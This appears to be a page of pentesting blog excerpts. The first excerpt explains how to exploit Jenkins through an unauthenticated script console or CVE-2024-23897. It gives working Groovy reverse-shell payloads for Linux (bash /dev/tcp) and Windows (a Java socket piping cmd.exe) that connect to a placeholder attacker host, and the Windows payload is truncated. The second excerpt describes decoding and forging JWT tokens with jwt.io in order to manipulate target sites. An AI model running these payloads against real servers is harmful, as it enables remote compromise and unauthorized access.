Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
JSON Web Token (JWT) is a standard for securely transmitting information between parties as a JSON object. This information can be verified and trusted because as it is digitally signed using the public/private keys. In this post, i will be explaining about the JWT and how it can be manipulated to perform certain functions, especially during penetration testing.
Access the website that uses JWT token and open the developer tools in the web-browser to see the JWT token. To decode the token, we can use a handy website https://jwt.io .Copy the token and paste it on the website to decode.You can see the key pair values.
And if you want to generate your own customized JWT token, you can do it in the same way. Create the header and the payload data based on your desired fields. The jwt.io site generates and sign the key using the key-pairs. Then copy the encoded token and re-transmit to the target website to do manipulation.